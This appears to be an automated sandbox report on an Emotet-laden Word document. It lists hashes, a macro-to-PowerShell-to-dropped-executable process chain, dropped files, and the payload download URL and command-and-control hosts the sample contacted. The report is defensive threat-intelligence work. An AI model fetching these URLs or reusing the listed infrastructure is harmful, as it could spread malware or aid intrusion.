File name: 2019-11-07 Queja V284-38874 EV296.doc

Full analysis: https://app.any.run/tasks/49eeb7c2-c4d0-4d22-a323-01f3e47e09ae
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: November 08, 2019, 14:47:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Enim ut hic., Author: Vladislav Gaparovic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 12:18:00 2019, Last Saved Time/Date: Thu Nov 7 12:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0
MD5: DF1B6A42BDCA5BE66728F8C7C479DA54
SHA1: 31F0F194097A17F558A374ABA8B15DE586FA5A10
SHA256: 3E4579B7DE17867F47F78840EF90AB6AD429AD2004EDE48D9097F997F1474F96
SSDEEP: 6144:7CTJQGgyNVHNaqDSzGdD48+arOn76UwEt7XTB:7CTJQGgyNHaiWGe8+KOn+qt7N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 299.exe (PID: 2588)
      • 299.exe (PID: 2496)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 4008)
    • Executed via WMI

      • powershell.exe (PID: 4008)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4008)
    • Creates files in the user directory

      • powershell.exe (PID: 4008)
    • Application launched itself

      • 299.exe (PID: 2588)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 944)
    • Reads settings of System Certificates

      • powershell.exe (PID: 4008)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 197
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 169
Words: 29
Pages: 1
ModifyDate: 2019:11:07 12:18:00
CreateDate: 2019:11:07 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Vladislav Gašparovic
Subject: -
Title: Enim ut hic.
No data.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 4
Malicious processes: 0
Suspicious processes: 1

Behavior graph

Interactive process graph available in the full report. Processes shown: winword.exe, powershell.exe, 299.exe, 299.exe (edges labelled "start" and "drop and start").

Process information

  • PID 944: WINWORD.EXE
    CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-11-07 Queja V284-38874 EV296.doc"
    Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Parent process: explorer.exe
    User: admin
    Company: Microsoft Corporation
    Integrity Level: MEDIUM
    Description: Microsoft Word
    Version: 14.0.6024.1000
  • PID 4008: powershell.exe
    CMD / Path: powershell -enco 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:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Parent process: wmiprvse.exe
    User: admin
    Company: Microsoft Corporation
    Integrity Level: MEDIUM
    Description: Windows PowerShell
    Exit code: 0
    Version: 6.1.7600.16385 (win7_rtm.090713-1255)
  • PID 2588: 299.exe
    CMD: "C:\Users\admin\299.exe"
    Path: C:\Users\admin\299.exe
    Parent process: powershell.exe
    User: admin
    Company: Microsoft Corporation
    Integrity Level: MEDIUM
    Description: Watson Subscriber for SENS Network Notifications
    Exit code: 0
    Version: 12.0.6606.1000
  • PID 2496: 299.exe
    CMD: --809e8ef0
    Path: C:\Users\admin\299.exe
    Parent process: 299.exe
    User: admin
    Company: Microsoft Corporation
    Integrity Level: MEDIUM
    Description: Watson Subscriber for SENS Network Notifications
    Version: 12.0.6606.1000
Total events: 2 211
Read events: 1 393
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 1
Suspicious files: 6
Text files: 0
Unknown types: 15

Dropped files

  • PID 944, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVRA766.tmp.cvr
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\85UMA4S03JFE0GBYHIL4.temp
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Local\Temp\Cab6BB0.tmp
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Local\Temp\Tar6BB1.tmp
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Local\Temp\Cab6BC1.tmp
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Local\Temp\Tar6BC2.tmp
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Local\Temp\Cab6DC7.tmp
  • PID 4008, powershell.exe: C:\Users\admin\AppData\Local\Temp\Tar6DC8.tmp
  • PID 944, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6922E5C.wmf (type: wmf)
    MD5: CFE5A2A3CE5C86B0B14855979281111E
    SHA256: 29EBF28B992A2A38802E7B80FF3D318989DC36FD6B015FAD76E3F3867B7D8502
  • PID 944, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CB81368.wmf (type: wmf)
    MD5: E7CBC9AB1E522360D41217B2AD794873
    SHA256: D72B874F4B1A9485A9A189B4BEF6249F8D59E2D60A233AE22EF4E73DC00499AD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 10
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4008 | powershell.exe | GET | 302 | 211.233.63.40:80 | http://www.gpfkorea.org/wp-admin/s6ngc4-yjpg8ku-5811/ | KR | | | suspicious
4008 | powershell.exe | GET | 404 | 211.233.63.40:80 | http://www.gpfkorea.org/not_found | KR | html | 54.6 Kb | suspicious
4008 | powershell.exe | GET | 200 | 205.185.216.10:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 57.4 Kb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4008 | powershell.exe | 165.227.204.101:443 | ufairfax.edu | Digital Ocean, Inc. | US | unknown
4008 | powershell.exe | 207.154.196.11:443 | 1c.pl | Digital Ocean, Inc. | DE | unknown
4008 | powershell.exe | 211.233.63.40:80 | www.gpfkorea.org | LG DACOM Corporation | KR | suspicious
4008 | powershell.exe | 207.154.196.11:80 | 1c.pl | Digital Ocean, Inc. | DE | unknown
4008 | powershell.exe | 164.68.123.209:443 | nextsoletrading.com | Cogent Communications | US | unknown
4008 | powershell.exe | 35.171.206.208:443 | savetax.idfcmf.com | Amazon.com, Inc. | US | unknown
4008 | powershell.exe | 205.185.216.10:80 | www.download.windowsupdate.com | Highwinds Network Group, Inc. | US | whitelisted

DNS requests

Domain | IP | Reputation
www.gpfkorea.org | 211.233.63.40 | suspicious
1c.pl | 207.154.196.11 | unknown
nextsoletrading.com | 164.68.123.209 | unknown
ufairfax.edu | 165.227.204.101 | unknown
savetax.idfcmf.com | 35.171.206.208 | suspicious
www.download.windowsupdate.com | 205.185.216.10, 205.185.216.42 | whitelisted

Threats

No threats detected
No debug info